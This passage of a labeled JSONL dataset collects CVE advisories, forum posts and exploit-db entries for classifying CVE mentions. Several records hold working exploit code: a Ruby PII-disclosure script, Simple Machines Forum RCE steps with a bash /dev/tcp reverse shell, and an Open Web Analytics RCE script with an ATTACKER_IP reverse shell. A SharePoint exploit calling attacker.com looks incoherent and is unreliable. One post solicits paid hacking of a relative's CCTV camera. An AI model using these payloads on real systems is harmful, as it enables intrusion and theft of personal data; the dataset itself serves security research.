"val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "12089abc6c0626dadbb6", "text": "Easy Appointments 1.4.2 - Information Disclosure\n\n# Exploit Title: Easy Appointments 1.4.2 - Information Disclosure\n# Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)\n# Author website: https://pwn.by/noraj/\n# Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482\n# Date: 2022-04-11\n# Vendor Homepage: https://easyappointments.org/\n# Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz\n# Version: < 1.4.3 (it means up to 1.4.2)\n# Tested on: Easy!Appointments Version 1.3.2\n\n# Vulnerability\n## Discoverer: Francesco CARLUCCI\n## Date: 2022-01-30\n## Discoverer website: https://carluc.ci/\n## Discovered on OpenNetAdmin 1.4.2\n## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments\n## CVE: CVE-2022-0482\n## CWE: CWE-863\n## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c\n## References:\n## - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/\n## - https://github.com/alextselegidis/easyappointments/tree/1.4.2\n## - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml\n## - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/\n## - https://nvd.nist.gov/vuln/detail/CVE-2022-0482\n\n#!/usr/bin/env ruby\n\nrequire 'date'\nrequire 'httpx'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\nEasy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure\n\n Source: https://github.com/Acceis/exploit-CVE-2022-0482\n\n Usage:\n #{__FILE__} [ ] [--debug]\n #{__FILE__} -h | --help\n\n Options:\n Root URL (base path) including HTTP scheme, port and root folder\n All events since (default: 2015-01-11)\n All events until (default: today)\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} http://10.0.0.1\n #{__FILE__} https://10.0.0.1:4567/subdir 2022-04-01 2022-04-30\nDOCOPT\n\ndef fetch_csrf(root_url, http)\n vuln_url = \"#{root_url}/index.php\"\n\n http.get(vuln_url)\nend\n\ndef exploit(root_url, startDate, endDate, http)\n vuln_url = \"#{root_url}/index.php/backend_api/ajax_get_calendar_events\"\n\n params = {\n 'csrfToken' => http.cookies.first.value, # csrfCookie\n 'startDate' => startDate.nil? ? '2015-01-11' : startDate,\n 'endDate' => endDate.nil? ? Date.today.to_s : endDate\n }\n\n http.post(vuln_url, form: params)\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n http = HTTPX.plugin(:cookies)\n fetch_csrf(args[''], http)\n puts exploit(args[''], args[''], args[''], http).body\nrescue Docopt::Exit => e\n puts e.message\nend", "source": "exploitdb", "timestamp": "2022-04-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e4f953f2429dea210a75", "text": "CVE: CVE-2022-0272\n\n[{'lang': 'en', 'value': 'Improper Restriction of XML External Entity Reference in GitHub repository detekt/detekt prior to 1.20.0.'}]\n\nFix commit: Parse Baseline in a secure way (#4499)", "source": "cvefixes", "timestamp": "2022-04-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d8c421e1b0caa6021e63", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5c40b6b34430864ca454", "text": "Subrion Cross-site scripting (XSS) vulnerability\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in Subrion CMS allows remote attackers to inject arbitrary web script or HTML via the body to blog/add/, a different vulnerability than CVE-2017-6069.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "66371ddf6729f100175e", "text": "SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution\n\n# Exploit Title: SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution\n# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)\n# Date: 7th March 2022\n# CVE ID: CVE-2022-26982\n# Confirmed on release 2.1.1\n# Vendor: https://download.simplemachines.org/\n# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!\n\n###############################################\n#Step1- Login with Admin Credentials\n#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php\n#Step3- Now add the vulnerable php reverse tcp web shell exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'\"); ?>\n#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page\n#Step5- Now click on \"Themes and Layout\" and you will get the reverse shell:\nE.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:\n\nlistening on [any] 4477 ...\nconnect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276\nbash: cannot set terminal process group (1334): Inappropriate ioctl for device\nbash: no job control in this shell\ndaemon@debian:/opt/bitnami/simplemachinesforum$ whoami\nwhoami\ndaemon\ndaemon@debian:/opt/bitnami/simplemachinesforum$ id\nid\nuid=1(daemon) gid=1(daemon) groups=1(daemon)\ndaemon@debian:/opt/bitnami/simplemachinesforum$", "source": "exploitdb", "timestamp": "2023-03-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fe4675097ec621526d16", "text": "How to run Inline Assembly with Compiler Generated Assembly Code\n\nHi currently I am attempting to use inline assembly language with compiler generated assembly code and while I have known Assembly Language for years this is my 1st time using inline assembly. Issue: When I use a section of my compiler generated assembly code in my C++ program which I Inlined I get a syntax error stating that it doesn't recognize my definitions even though they are pulled from my C++ program. My Question: How do I fix my Assembly syntax so my Inline Assembly Code will read my Assembly data? My Assembly Code and list of errors are below Software I am using: Microsoft Visual Studio 2008 C++ Platform: Windows 10 If you need additional specs due to it being Assembly Language let me know Code: #include \"DarkGDK.h\" #include \"Profiler.h\" #include using namespace std; void DarkGDK( void )\n{ //-----This is the end of the include process------------------// //------This is the start of the program-----------------------// const int RADIUS = 50; // Variables for the circle's XY coordinates. // We initialize these with the cordinates of // the center of the screen. int x = dbScreenWidth() / 2; int y = dbScreenHeight() / 2; dbSyncOn(); // Disable auto screen refresh dbSyncRate(60); // Set the maximum screen refresh rate // The game loop while ( LoopGDK()) { //-----This is just the profiler skip------------------// PROFILER_FRAME(\"DarkGDK( void )\"); PROFILE PROFILER_CATEGORY( \"dbUpKey\", Profiler::Color::Aqua ) PROFILER_CATEGORY( \"dbDownKey\", Profiler::Color::CadetBlue ) PROFILER_CATEGORY( \"dbLeftKey\", Profiler::Color::DarkGray ) PROFILER_CATEGORY( \"dbRightKey\", Profiler::Color::Magenta ) //-----This is just the profiler end skip------------------// // Clear the screen. dbCLS(); // Draw the circle at its current location. //dbCircle(x, y, RADIUS); __asm\n{ // ; //---------------------------------------------This is the part of the Optimization Attempt-----------------------------------------------------// //; 50 :\n//; 51 : // If any arrow key is being pressed, then\n//; 52 : // move the circle acccordingly.\n//; 53 :\n//; 54 : //---What I am attempting to optimize\n//; 55 :\n//; 56 : if ( dbUpKey() ) call ?dbUpKey@@YAHXZ //; dbUpKey test eax, eax je SHORT $LN4@DarkGDK //; 57 : {\n//; 58 : y--; mov eax, DWORD PTR _y$[ebp] sub eax, 1 mov DWORD PTR _y$[ebp], eax\n$LN4@DarkGDK: //; 59 : }\n//; 60 :\n//; 61 : if ( dbDownKey() ) call ?dbDownKey@@YAHXZ //; dbDownKey test eax, eax je SHORT $LN3@DarkGDK //; 62 : {\n//; 63 : y++; mov eax, DWORD PTR _y$[ebp] add eax, 1 mov DWORD PTR _y$[ebp], eax\n$LN3@DarkGDK: //; 64 : }\n//; 65 :\n//; 66 : if ( dbLeftKey() ) call ?dbLeftKey@@YAHXZ //; dbLeftKey test eax, eax je SHORT $LN2@DarkGDK //; 67 : {\n//; 68 : x--; mov eax, DWORD PTR _x$[ebp] sub eax, 1 mov DWORD PTR _x$[ebp], eax\n$LN2@DarkGDK: //; 69 : }\n//; 70 :\n//; 71 : if (dbRightKey() ) call ?dbRightKey@@YAHXZ //; dbRightKey test eax, eax je SHORT $LN1@DarkGDK //; 72 : {\n//; 73 : x++; mov eax, DWORD PTR _x$[ebp] add eax, 1 mov DWORD PTR _x$[ebp], eax\n$LN1@DarkGDK: //; 74 : }\n//; 75 : //---What I am attempting to optimize\n//; 76 : //; //---------------------------------------------This is the part of the Optimization Attempt End-----------------------------------------------------// } // If any arrow key is being pressed, then // move the circle acccordingly. //---What I am attempting to optimize /*if ( dbUpKey() ) { y--; } if ( dbDownKey() ) { y++; } if ( dbLeftKey() ) { x--; } if (dbRightKey() ) { x++; } //---What I am attempting to optimize\n*/ // Update the screen. dbSync(); //WinExec(\"C:\\Users\\DeVaughn\\Documents\\MasmAssemblyLanguagefileexamples\\run.bat\",SW_SHOWNORMAL); } //---Where the program has ended----// } Below are my list of errors Code: Error 3 error C2018: unknown character '0x40' line 73\nError 4 error C2018: unknown character '0x40' line 73\nError 7 error C2018: unknown character '0x40' line 75\nError 9 error C2018: unknown character '0x40' line 83\nError 13 error C2018: unknown character '0x40' line 89\nError 14 error C2018: unknown character '0x40' line 89\nError 17 e", "source": "go4expert", "timestamp": "2022-06-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "60abab30b70062e93ef9", "text": "CVE: CVE-2022-1034\n\n[{'lang': 'en', 'value': 'There is a Unrestricted Upload of File vulnerability in ShowDoc v2.10.3 in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: Security update / 安全性更新", "source": "cvefixes", "timestamp": "2022-03-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "95034c8cebf365b2e2ec", "text": "Just a note to all… ensure you run the code on the pwnbox. i was running it on my redhat server and getting the errors. same code on the pwnbox, worked ! thanks to PayloadBunny for the advice.", "source": "hackthebox", "timestamp": "2022-04-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0a59f1138483b197b753", "text": "Hello everyone, I am having the same problem as others before me: I am using the same script as posted before I create a token for htbuser and convert the given timestamp to epoch I also tried to take the timestamp and convert it to my time zone, then convert it to epoch Fed the timestamp to the script with a ±1000 ms range The script iterates 2000 times and each time creates an md5 hash of htbadmin+iteration# It sends the request and filters out all responses with the string “Wrong token” but… It does just that for 2000 times without returning any valid token. Nothing at all happens. So I am guessing that my mistake is at the beginning when I choose the timestamp to convert? I am using online websites or date -d ‘TIMESTAMP’ +%s for the conversion. Can someone point me in the right direction?", "source": "hackthebox", "timestamp": "2022-05-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "483d57b60e60b6f83ce8", "text": "Open Web Analytics 1.7.3 - Remote Code Execution\n\n# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)\n# Date: 2022-08-30\n# Exploit Author: Jacob Ebben\n# Vendor Homepage: https://www.openwebanalytics.com/\n# Software Link: https://github.com/Open-Web-Analytics\n# Version: <1.7.4\n# Tested on: Linux\n# CVE : CVE-2022-24637\n\nimport argparse\nimport requests\nimport base64\nimport re\nimport random\nimport string\nimport hashlib\nfrom termcolor import colored\n\ndef print_message(message, type):\n if type == 'SUCCESS':\n print('[' + colored('SUCCESS', 'green') + '] ' + message)\n elif type == 'INFO':\n print('[' + colored('INFO', 'blue') + '] ' + message)\n elif type == 'WARNING':\n print('[' + colored('WARNING', 'yellow') + '] ' + message)\n elif type == 'ALERT':\n print('[' + colored('ALERT', 'yellow') + '] ' + message)\n elif type == 'ERROR':\n print('[' + colored('ERROR', 'red') + '] ' + message)\n\ndef get_normalized_url(url):\n if url[-1] != '/':\n url += '/'\n if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':\n url = \"http://\" + url\n return url\n\ndef get_proxy_protocol(url):\n if url[0:8].lower() == 'https://':\n return 'https'\n return 'http'\n\ndef get_random_string(length):\n chars = string.ascii_letters + string.digits\n return ''.join(random.choice(chars) for i in range(length))\n\ndef get_cache_content(cache_raw):\n regex_cache_base64 = r'\\*(\\w*)\\*'\n regex_result = re.search(regex_cache_base64, cache_raw)\n if not regex_result:\n print_message('The provided URL does not appear to be vulnerable ...', \"ERROR\")\n exit()\n else:\n cache_base64 = regex_result.group(1)\n return base64.b64decode(cache_base64).decode(\"ascii\")\n\ndef get_cache_username(cache):\n regex_cache_username = r'\"user_id\";O:12:\"owa_dbColumn\":11:{s:4:\"name\";N;s:5:\"value\";s:5:\"(\\w*)\"'\n return re.search(regex_cache_username, cache).group(1)\n\ndef get_cache_temppass(cache):\n regex_cache_temppass = r'\"temp_passkey\";O:12:\"owa_dbColumn\":11:{s:4:\"name\";N;s:5:\"value\";s:32:\"(\\w*)\"'\n return re.search(regex_cache_temppass, cache).group(1)\n\ndef get_update_nonce(url):\n try:\n update_nonce_request = session.get(url, proxies=proxies)\n regex_update_nonce = r'owa_nonce\" value=\"(\\w*)\"'\n update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)\n except Exception as e:\n print_message('An error occurred when attempting to update config!', \"ERROR\")\n print(e)\n exit()\n else:\n return update_nonce\n\nparser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')\nparser.add_argument('TARGET', type=str,\n help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')\nparser.add_argument('ATTACKER_IP', type=str,\n help='Address for reverse shell listener on attacking machine')\nparser.add_argument('ATTACKER_PORT', type=str,\n help='Port for reverse shell listener on attacking machine')\nparser.add_argument('-u', '--username', default=\"admin\", type=str,\n help='The username to exploit (Default: admin)')\nparser.add_argument('-p','--password', default=get_random_string(32), type=str,\n help='The new password for the exploited user')\nparser.add_argument('-P','--proxy', type=str,\n help='HTTP proxy address (Example: http://127.0.0.1:8080/)')\nparser.add_argument('-c', '--check', action='store_true',\n help='Check vulnerability without exploitation')\n\nargs = parser.parse_args()\n\nbase_url = get_normalized_url(args.TARGET)\nlogin_url = base_url + \"index.php?owa_do=base.loginForm\"\npassword_reset_url = base_url + \"index.php?owa_do=base.usersPasswordEntry\"\nupdate_config_url = base_url + \"index.php?owa_do=base.optionsGeneral\"\n\nusername = args.username\nnew_password = args.password\n\nreverse_shell = '$sock, 1=>$sock, 2=>$sock),$pipes);?>'\nshell_filename ", "source": "exploitdb", "timestamp": "2022-11-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bd88fa67196eff5bdf02", "text": "CVE: CVE-2021-32436\n\n[{'lang': 'en', 'value': 'An out-of-bounds read in the function write_title() in subs.c of abcm2ps v8.14.11 allows remote attackers to cause a Denial of Service (DoS) via unspecified vectors.'}]\n\nFix commit: fix: array overflow when wrong duration in voice overlay\n\nIssue #83,", "source": "cvefixes", "timestamp": "2022-03-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "51b0d1c8a11cb923f345", "text": "CVE: CVE-2022-24880\n\n[{'lang': 'en', 'value': 'flask-session-captcha is a package which allows users to extend Flask by adding an image based captcha stored in a server side session. In versions prior to 1.2.1, he `captcha.validate()` function would return `None` if passed no value (e.g. by submitting an having an empty form). If implementing users were checking the return value to be **False**, the captcha verification check could be bypassed. Version 1.2.1 fixes the issue. Users can workaround the issue by not explicitly checking that the value is False. Checking the return value less explicitly should still work.'}]\n\nFix commit: add some extra tests to ensure False is returned", "source": "cvefixes", "timestamp": "2022-04-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d89c90547b67d26d1d97", "text": "Improper Input Validation in Apache Struts\n\n[Severity: HIGH]\n\nActionServlet.java in Apache Struts 1 1.x through 1.3.10 mishandles multithreaded access to an ActionForm instance, which allows remote attackers to execute arbitrary code or cause a denial of service (unexpected memory access) via a multipart request, a related issue to CVE-2015-0899.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "dffe45ee74048535e04a", "text": "Microsoft SharePoint Enterprise Server 2016 - Spoofing\n\n// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing\n// Date: 2023-06-20\n// country: Iran\n// Exploit Author: Amirhossein Bahramizadeh\n// Category : Remote\n// Vendor Homepage:\n// Microsoft SharePoint Foundation 2013 Service Pack 1\n// Microsoft SharePoint Server Subscription Edition\n// Microsoft SharePoint Enterprise Server 2013 Service Pack 1\n// Microsoft SharePoint Server 2019\n// Microsoft SharePoint Enterprise Server 2016\n// Tested on: Windows/Linux\n// CVE : CVE-2023-28288\n\n#include \n#include \n\n\n// The vulnerable SharePoint server URL\nconst char *server_url = \"http://example.com/\";\n\n// The URL of the fake SharePoint server\nconst char *fake_url = \"http://attacker.com/\";\n\n// The vulnerable SharePoint server file name\nconst char *file_name = \"vuln_file.aspx\";\n\n// The fake SharePoint server file name\nconst char *fake_file_name = \"fake_file.aspx\";\n\nint main()\n{\n HANDLE file;\n DWORD bytes_written;\n char file_contents[1024];\n\n // Create the fake file contents\n sprintf(file_contents, \"

    This is a fake file.

    \");\n\n // Write the fake file to disk\n file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);\n if (file == INVALID_HANDLE_VALUE)\n {\n printf(\"Error creating fake file: %d\\n\", GetLastError());\n return 1;\n }\n if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))\n {\n printf(\"Error writing fake file: %d\\n\", GetLastError());\n CloseHandle(file);\n return 1;\n }\n CloseHandle(file);\n\n // Send a request to the vulnerable SharePoint server to download the file\n sprintf(file_contents, \"%s%s\", server_url, file_name);\n file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);\n if (file == INVALID_HANDLE_VALUE)\n {\n printf(\"Error creating vulnerable file: %d\\n\", GetLastError());\n return 1;\n }\n if (!InternetReadFileUrl(file_contents, file))\n {\n printf(\"Error downloading vulnerable file: %d\\n\", GetLastError());\n CloseHandle(file);\n return 1;\n }\n CloseHandle(file);\n\n // Replace the vulnerable file with the fake file\n if (!DeleteFile(file_name))\n {\n printf(\"Error deleting vulnerable file: %d\\n\", GetLastError());\n return 1;\n }\n if (!MoveFile(fake_file_name, file_name))\n {\n printf(\"Error replacing vulnerable file: %d\\n\", GetLastError());\n return 1;\n }\n\n // Send a request to the vulnerable SharePoint server to trigger the vulnerability\n sprintf(file_contents, \"%s%s\", server_url, file_name);\n if (!InternetReadFileUrl(file_contents, NULL))\n {\n printf(\"Error triggering vulnerability: %d\\n\", GetLastError());\n return 1;\n }\n\n // Print a message indicating that the vulnerability has been exploited\n printf(\"Vulnerability exploited successfully.\\n\");\n\n return 0;\n}\n\nBOOL InternetReadFileUrl(const char *url, HANDLE file)\n{\n HINTERNET internet, connection, request;\n DWORD bytes_read;\n char buffer[1024];\n\n // Open an Internet connection\n internet = InternetOpen(\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n if (internet == NULL)\n {\n return FALSE;\n }\n\n // Connect to the server\n connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);\n if (connection == NULL)\n {\n InternetCloseHandle(internet);\n return FALSE;\n }\n\n // Send the HTTP request\n request = HttpOpenRequest(connection, \"GET\", url, NULL, NULL, NULL, 0, 0);\n if (request == NULL)\n {\n InternetCloseHandle(connection);\n InternetCloseHandle(internet);\n return FALSE;\n }\n if (!HttpSendRequest(request, NULL, 0, NULL, 0))\n {\n InternetCloseHandle(request);\n InternetCloseHandle(connection);\n InternetCloseHandle(internet)", "source": "exploitdb", "timestamp": "2023-06-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6d40704059d46d71548d", "text": "BoxBuster: Harry is 1337 for anyone struggling please use this guide. Additionally, be sure to use the password policy from previous exercise in the module. I agree the question was poorly formulated. Took me more time to figure what the question was referring to that to answer. I guess that’s the point on a question right lol . Understanding even what the heck it means lol", "source": "hackthebox", "timestamp": "2022-06-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c7f56f8f40ac8ee5f6a1", "text": "CVE: CVE-2022-0085\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository dompdf/dompdf prior to 2.0.0.'}]\n\nFix commit: Add a default context\n\n- creates a user agent\n- disables following redirects", "source": "cvefixes", "timestamp": "2022-06-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0ff840cfb4aca53e60c5", "text": "ClassLoader manipulation in Apache Struts\n\n[Severity: HIGH]\n\nParametersInterceptor in Apache Struts before 2.3.20 does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d474f2648075145034c9", "text": "Microsoft Exchange Server Remote Code Execution Vulnerability\n\nAffected: Microsoft Exchange Server\n\nMicrosoft Exchange Server contains an unspecified vulnerability that allows for authenticated remote code execution. Dubbed \"ProxyNotShell,\" this vulnerability is chainable with CVE-2022-41040 which allows for the remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "source": "cisa_kev", "timestamp": "2022-09-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d8802f22010a7ced34c4", "text": "BurpSuite Update\n\nFirst post in here! I’m on the latest version of Parrot. I’ve installed Burp 3.8 and since deleted it after releasing it was already installed (only 2.4). Trying to find where the dir for this is located so that I can update the version that’s already installed with Parrot. (This is an OCD thing, as Burp worked fine when I’d installed it) Thanks!", "source": "parrotsec", "timestamp": "2022-05-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d65841ced5d919dfa598", "text": "CVE: CVE-2022-23586\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. A malicious user can cause a denial of service by altering a `SavedModel` such that assertions in `function.cc` would be falsified and crash the Python interpreter. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Eliminate debug `CHECK`-fail from `function.cc`\n\nPiperOrigin-RevId: 409416119\nChange-Id: I8376ee464d434e9b970ff0ad49edfdaa2a273cfe", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "978e8451438b6ca4a4f2", "text": "DoS vulnerabilities persist in ESAPI file uploads despite remediation of CVE-2023-24998\n\n[Severity: HIGH]\n\n### Impact\nESAPI 2.5.2.0 and later addressed the DoS vulnerability described in CVE-2023-24998, which Apache Commons FileUpload 1.5 attempted to remediate. But while writing up a new security bulletin regarding the impact on the affected ESAPI `HTTPUtilities.getFileUploads` methods (or more specifically those methods in the `DefaultHTTPUtilities` implementation class), I realized that a DoS vulnerability still persists in ESAPI and for that matter in Apache Commons FileUpload as well.\n\n### Related to\nCVE-2023-24998\n\n### Patches\nESAPI 2.5.2.0 or later.\n\n### Workarounds\n- See the 'Solutions' section of Security Bulletin 11, in the References section. If you are not using ESAPI file uploads, see also the 'Workarounds' section.\n- Deploy an external WAF or other suitable DoS protection.\n- Add additional defenses to your code using HTTPUtilities.getFileUpload, such as requiring prior authentication, restricting how many / much content can be uploaded per user per day or per hour, etc. (It is the opinion of the ESAPI development team that such required controls should not be added to ESAPI because it is a general purpose security library and thus ESAPI ought not be enforcing generic policies like these on everyone, especially it it could break existing code bases.)\n\n### References\n[Security Bulletin 11: How Does CVE-2023-24998 Impact ESAPI?](https://github.com/ESAPI/esapi-java-legacy/blob/develop/documentation/ESAPI-security-bulletin11.pdf)\nNew ESAPI 2.5.2.0 or later Javadoc on HTTPUtilities.getFileUploads: https://javadoc.io/static/org.owasp.esapi/esapi/2.5.2.0/org/owasp/esapi/HTTPUtilities.html#getFileUploads-javax.servlet.http.HttpServletRequest-java.io.File-java.util.List-\n(Note: This link won't work until the 2.5.2.0 release is made official.)\n\n### Final Word\n(Especially to GitHub Advance Security team / GitHub as a CNA) -- I do not really wish to file a CVE for this. I had originally considered it, but there is no real way to address the general DoS scenarios for file uploads without breaking ESAPI client code which we are not willing to do. The clients have to take some responsibility for this themselves. In the next ESAPI release, I am going to add a reference to the appropriate Javadoc to this GitHub Security Advisory, but that's the best we can do. If you wish to discuss this with me, please first contact me via email at kevin.w.wall@gmail.com. ", "source": "github_advisory", "timestamp": "2023-10-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fc715c901989eab06ea6", "text": "I still do not understand how it works, could you explain it more? I have no idea what I should add what in my modified code. Thanks a lot", "source": "hackthebox", "timestamp": "2023-06-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "efb2d42f62834ec713da", "text": "Hello. May i ask? I have completed ‘ Digging in… ’ and ‘ Bypassing Authentication ’. But I missed it ‘ Going Deeper ’. In which direction should I do to find ‘ Going Deeper ’? More dig -ging?", "source": "hackthebox", "timestamp": "2022-08-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "28bcb610a3a45e154abf", "text": "I got stuck too in this lesson but at the end I figured even \"apt list --installed | wc -l \" works too! but it adds one to the actual output. cuz wc counts the lines and the first line of the output of “apt list --installed” is Listing…done.", "source": "hackthebox", "timestamp": "2022-01-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b309c010be9ece3f9dd6", "text": "Puppet Denial of Service and Arbitrary File Write\n\n[Severity: LOW]\n\nA vulnerability in Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet Enterprise (PE) Users 1.0, 1.1, 1.2.x, 2.0.x, and 2.5.x before 2.5.1 allows remote authenticated users with agent SSL keys to **(1)** cause a denial of service (memory consumption) via a REST request to a stream that triggers a thread block, as demonstrated using CVE-2012-1986 and `/dev/random`; or **(2)** cause a denial of service (filesystem consumption) via crafted REST requests that use \"a marshaled form of a `Puppet::FileBucket::File object`\" to write to arbitrary file locations.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7f78c4760ee79b581a89", "text": "This command worked for me for both logs and bak files: find / -type f -name *.bak -exec ls -al {} ; 2>/dev/null |wc -l", "source": "hackthebox", "timestamp": "2022-08-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b3fda5dabbed48395ba9", "text": "I am Looking for someone who can access CCTV camera of my bro house. I have IP address and Camera Info\n\nCan someone perform this task? It is a paid task and my budget is $100 and near about. If can someone do it please reply me. It is very serious problem with my family, My Elder brother is on the stage of Divorce and our family want to help him with the situation. Thanks", "source": "hackersploit", "timestamp": "2022-05-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "07089b96039c289acded", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0673, CVE-2020-0674, CVE-2020-0710, CVE-2020-0712, CVE-2020-0713, CVE-2020-0767.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8fd4cb82410fd69b0b28", "text": "Potential leak of authentication data to 3rd parties\n\n[Severity: CRITICAL]\n\n### Impact\nUsers of typed-rest-client library version 1.7.3 or lower are vulnerable to leak authentication data to 3rd parties. \n\nThe flow of the vulnerability is as follows:\n\n1. Send any request with `BasicCredentialHandler`, `BearerCredentialHandler` or `PersonalAccessTokenCredentialHandler` \n2. The target host may return a redirection (3xx), with a link to a second host.\n3. The next request will use the credentials to authenticate with the second host, by setting the `Authorization` header.\n\nThe expected behavior is that the next request will *NOT* set the `Authorization` header.\n\n\n### Patches\nThe problem was fixed on April 1st 2020.\n\n\n### Workarounds\nThere is no workaround.\n\n### References\nThis is similar to the following issues in nature:\n1. [HTTP authentication leak in redirects](https://curl.haxx.se/docs/CVE-2018-1000007.html) - I used the same solution as CURL did.\n2. [CVE-2018-1000007](https://nvd.nist.gov/vuln/detail/CVE-2018-1000007).", "source": "github_advisory", "timestamp": "2023-04-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4b31a2206c9fd1bbc548", "text": "CVE: 